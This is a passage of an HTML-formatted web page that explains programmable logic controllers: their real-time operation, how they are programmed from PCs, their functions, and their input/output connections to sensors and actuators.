Unlike general-purpose computers, the PLC is designed for multiple inputs and output arrangements, extended temperature ranges, immunity to electrical noise, and resistance to vibration and impact. Programs to control machine operation are typically stored in battery-backed-up or <span style=\"color: windowtext;text-decoration: none\">non-volatile<\/span><span style=\"color: windowtext;text-decoration: none\"> memory<\/span>. A <a title=\"\u05d0\u05d5\u05d8\u05d5\u05de\u05e6\u05d9\u05d4 \u05d5\u05d1\u05e7\u05e8\u05d4 \u2013 \u05d1\u05e7\u05e8 \u05dc\u05d5\u05d2\u05d9 \u05de\u05ea\u05d5\u05db\u05e0\u05ea \u2013 PLC\" href=\"http:\/\/smartlogic.co.il\/%d7%95%d7%9c%d7%93%d7%99%d7%a6%d7%99%d7%94-validation-case-study-part-1\/\">PLC<\/a> is an example of a hard <span style=\"color: windowtext;text-decoration: none\">real time<\/span> system since output results must be produced in response to input conditions within a limited time, otherwise unintended operation will result.<\/p>\n<p style=\"text-align: left\">PLCs are usually programmed using application software (SW) on personal computers (PCs). The PC is connected to the <strong>PLC<\/strong> through Ethernet, RS-232, RS-485 or RS-422 cabling. Generally the SW provides functions for debugging and troubleshooting the <strong>PLC<\/strong> software, for example, by highlighting portions of the logic to show current status during operation or via simulation. The SW will upload and download the <strong>PLC<\/strong> program, for backup and restoration purposes.<\/p>\n<h2 style=\"text-align: left\"><strong>PLC Functionality<\/strong><\/h2>\n<p style=\"text-align: left\">The functionality of the <strong>PLC<\/strong> includes sequential relay control, motion control, process control, distributed control systems and networking. The data handling, storage, processing power and communication capabilities of some modern <strong>PLCs<\/strong> are approximately equivalent to desktop computers.<\/p>\n<h2 style=\"text-align: left\"><strong>PLC Features<\/strong><\/h2>\n<p style=\"text-align: left\">The <strong>PLC<\/strong> unit consists of separate elements, such as power supply, controller, relay units for in- and output<\/p>\n<p style=\"text-align: left\">The main difference from other computers is that <strong>PLCs<\/strong> are armored for severe conditions (such as dust, moisture, heat, cold) and have the facility for extensive input\/output (I\/O) arrangements. These connect the <strong>PLC<\/strong> to sensors and actuators. <strong>PLCs<\/strong> read limit switches, analog process variables (such as temperature and pressure), and the positions of complex positioning systems. On the actuator side, <strong>PLCs<\/strong> operate electric motors, pneumatic or hydraulic cylinders, magnetic relays, solenoids, or analog outputs.
